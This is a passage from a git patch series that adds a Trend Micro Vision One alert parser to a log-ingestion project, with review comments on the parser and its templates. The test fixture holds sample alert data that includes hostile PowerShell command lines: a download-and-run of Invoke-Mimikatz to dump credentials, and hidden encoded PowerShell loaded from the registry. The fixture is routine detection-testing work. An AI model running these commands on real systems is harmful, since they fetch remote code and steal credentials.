+ "field": "network.application",
+ "value": "chrome"
+ },
+ {
+ "field": "event.action",
+ "value": "CHROME_OS_LOGIN_EVENT"
+ },
+ {
+ "field": "event.reason"
+ },
+ {
+ "field": "device.model.name"
+ },
+ {
+ "field": "user.id"
}
]
},
From 90a003cc629a1666e04ae08bd97a170fb0c27cfe Mon Sep 17 00:00:00 2001
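Review bot: The new entry in the `-386,6 +389,31` hunk interpolates `{host.name}` but its conditions require `device.model.name` and never `host.name`, so the template can render with an empty host and, for the CHROME_OS_LOGIN_EVENT fixture adjusted in the previous commit (host.name set, no device.model.name), it will not be selected at all. Its condition list also appears to repeat the preceding login entry's, which leaves the two ambiguous; the intent reads as a host-based fallback, which needs `{ "field": "host.name" }` in place of `{ "field": "device.model.name" }`. As a point of style, the three chrome login/logout templates disagree on "ID" versus "id" and use "log in :" where "logged in:" describes a past event; the same wording applies to the `-367` hunk above.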
From: lvoloshyn-sekoia
Date: Tue, 19 Nov 2024 09:48:10 +0200
Subject: [PATCH 247/317] Add format for Trend Micro Vision One
---
.../trend-micro-vision-one/CHANGELOG.md | 8 ++
.../trend-micro-vision-one/_meta/fields.yml | 29 +++++++
.../trend-micro-vision-one/_meta/logo.png | Bin 0 -> 10452 bytes
.../trend-micro-vision-one/_meta/manifest.yml | 9 ++
.../_meta/smart-descriptions.json | 0
.../trend-micro-vision-one/ingest/parser.yml | 79 ++++++++++++++++++
.../tests/test_process.json | 66 +++++++++++++++
.../tests/test_registry.json | 72 ++++++++++++++++
8 files changed, 263 insertions(+)
create mode 100644 Trend Micro/trend-micro-vision-one/CHANGELOG.md
create mode 100644 Trend Micro/trend-micro-vision-one/_meta/fields.yml
create mode 100644 Trend Micro/trend-micro-vision-one/_meta/logo.png
create mode 100644 Trend Micro/trend-micro-vision-one/_meta/manifest.yml
create mode 100644 Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json
create mode 100644 Trend Micro/trend-micro-vision-one/ingest/parser.yml
create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_process.json
create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_registry.json
diff --git a/Trend Micro/trend-micro-vision-one/CHANGELOG.md b/Trend Micro/trend-micro-vision-one/CHANGELOG.md
new file mode 100644
index 000000000..11bddf32c
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/CHANGELOG.md
@@ -0,0 +1,8 @@
+# Changelog
+
+All notable changes to this project will be documented in this file.
+
+The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
+and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
+
+## [Unreleased]
diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one/_meta/fields.yml
new file mode 100644
index 000000000..f18d3cb5d
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/_meta/fields.yml
@@ -0,0 +1,29 @@
+trendmicro.vision_one.alert_id:
+ description: ''
+ name: trendmicro.vision_one.alert_id
+ type: keyword
+
+trendmicro.vision_one.case_id:
+ description: ''
+ name: trendmicro.vision_one.case_id
+ type: keyword
+
+trendmicro.vision_one.incident_id:
+ description: ''
+ name: trendmicro.vision_one.incident_id
+ type: keyword
+
+trendmicro.vision_one.investigation_status:
+ description: ''
+ name: trendmicro.vision_one.investigation_status
+ type: keyword
+
+trendmicro.vision_one.severity:
+ description: ''
+ name: trendmicro.vision_one.severity
+ type: keyword
+
+trendmicro.vision_one.status:
+ description: ''
+ name: trendmicro.vision_one.status
+ type: keyword
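Review bot: All six new field declarations carry `description: ''`, so the generated field reference for this format will list them with no explanation. Short descriptions derived from the names would already help, e.g. `description: Identifier of the Vision One alert` for `trendmicro.vision_one.alert_id` and `description: Investigation status of the alert` for `trendmicro.vision_one.investigation_status`. The distinction between `status` and `investigation_status` in particular cannot be recovered from the names alone and deserves a sentence each.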
diff --git a/Trend Micro/trend-micro-vision-one/_meta/logo.png b/Trend Micro/trend-micro-vision-one/_meta/logo.png new file mode 100644 index 0000000000000000000000000000000000000000..e51bb3eb7725123b5278a71034969dfbbd5ca157 GIT binary patch literal 10452 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 wM>ZBJ6Qe~@DrfdBvi literal 0 HcmV?d00001 diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml new file mode 100644 index 000000000..c0121a28d --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml @@ -0,0 +1,9 @@ +uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e +name: Trend Micro Vision One +slug: trend-micro-vision-one + +description: >- + Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation. + +data_sources: + Process monitoring: diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json new file mode 100644 index 000000000..e69de29bb diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml new file mode 100644 index 000000000..38a31dd29 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml 
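Review bot: `data_sources` in the new manifest lists only `Process monitoring`, while the parser added in the same commit also maps registry keys and values, file hashes and paths, and container and account entities, so the list looks incomplete if it is meant to describe what the format covers; I am inferring the intended coverage from the parser, not from vendor documentation. The `description` also says nothing about which Vision One objects the format ingests — the parser's use of `workbenchLink`, `alert_id` and `investigation_status` suggests workbench alerts — and a one-line addition there would spare the next reader a trip through the parser.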
@@ -0,0 +1,79 @@ +name: trend-micro-vision-one +ignored_values: [] +pipeline: + - name: parsed_event + external: + name: json.parse-json + properties: + input_field: "{{original.message}}" + output_field: message + + - name: set_ecs_fields + +stages: + set_ecs_fields: + actions: + - set: + event.kind: alert + event.category: ["intrusion_detection"] + event.type: ["info"] + observer.vendor: "TrendMicro" + observer.product: "Vision One" + + - set: + "@timestamp": "{{parsed_event.message.createdDateTime}}" + + organization.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" + organization.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityId }}" + host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}" + host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}" + + user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'emailAddress') | first).entityValue }}" + container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityValue }}" + container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityId }}" + + rule.name: "{{parsed_event.message.model}}" + rule.id: "{{parsed_event.message.model.modelId}}" + + event.url: "{{parsed_event.message.model.workbenchLink}}" + + process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" + process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" + + registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 
'registry_key') | first).value.split('\\\\')[0] }}" + registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" + + registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}" + + registry.path: > + {%- set path = [] -%} + {%- for indicator in parsed_event.message.indicators -%} + {%- if indicator.type == 'registry_key' -%}{%- set path = path.append(indicator.value) -%}{% endif %} + {%- endfor -%} + {%- for indicator in parsed_event.message.indicators -%} + {%- if indicator.type == 'registry_value' -%}{%- set path = path.append(indicator.value) -%}{% endif %} + {%- endfor -%} + {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} + + # @todo should be along with registry.data.type to REG_SZ + registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}" + + file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}" + file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}" + file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}" + file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}" + + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" + 
process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" + + user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}" + + trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" + trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}" + trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}" + trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}" + trendmicro.vision_one.status: "{{parsed_event.message.status}}" + trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json new file mode 100644 index 000000000..5eca6b2ea --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json 
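Review bot: `rule.id` and `event.url` dereference `parsed_event.message.model`, which the fixtures show is a plain string (the model name), so `model.modelId` and `model.workbenchLink` resolve to nothing and both fields are silently dropped — the expected outputs in test_process.json and test_registry.json contain neither `rule.id` nor `event.url` even though their inputs carry `modelId` and `workbenchLink`. They should read the top-level keys: `rule.id: "{{parsed_event.message.modelId}}"` and `event.url: "{{parsed_event.message.workbenchLink}}"`. The `registry.path` template also appends every `registry_key` indicator, and the registry fixture carries two identical ones (one per matched filter), so the expected path in test_registry.json becomes `hkcr\ms-settings\shell\open\command\hkcr\ms-settings\shell\open\command\delegateexecute`; taking only the first `registry_key` (as `registry.hive` and `registry.key` already do) or skipping a value already present in `path` would yield a single key path. The `matchedFilters[].mitreTechniqueIds` list present in both fixtures is not mapped at all; `threat.technique.id` would be the natural ECS target for it.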
@@ -0,0 +1,66 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], 
\"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": 
